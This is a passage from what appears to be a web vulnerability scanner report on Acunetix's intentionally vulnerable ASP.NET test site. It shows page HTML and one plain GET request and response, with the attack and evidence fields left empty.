href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" 